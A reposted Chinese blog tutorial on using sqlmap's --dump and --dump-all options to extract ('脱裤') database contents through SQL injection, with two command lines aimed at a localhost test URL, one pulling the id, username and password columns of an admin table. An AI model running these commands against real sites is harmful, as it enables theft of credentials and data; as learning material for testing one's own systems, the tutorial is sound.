SQLMAP脱裤

本文转载自查看原文 2016-12-19 23:20 4813 小知识/ sql注入及防御技术

之前就有一个朋友问，咋使用sqlmap脱裤。然后我丢了一个参数给他，他好像懵逼懵逼的。今天又有一个哥们儿在群里问，行吧。就直接教一下。

其实很简单。

--dump这个参数就是用来脱裤的哟。如果你要拖整个表的话你可以加个-all(--dump-all)

CODE:

sqlmap.py -u "http://127.0.0.1/index.php?id=1" --dump -D sqlinject -T admin -C "id,username,password"

脱出数据如下所示：

仅一个文件。就是你选定了的数据。

那么我们加all呢？（PS：此时可以把那些字段都给去掉。）

CODE：

sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D sqlinject --dump-all

可见如下是三个文件。

这三个文件是啥呢？解惑便是下图所示。

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 Sqlmap脱库之“你的数据我所见” sqlmap 域PC脱域 SQLmap的使用 sqlmap详解 sqlmap使用 sqlmap的安装 sqlmap使用 Sqlmap 学习笔记1:sqlmap参数 Docker 代理脱坑指南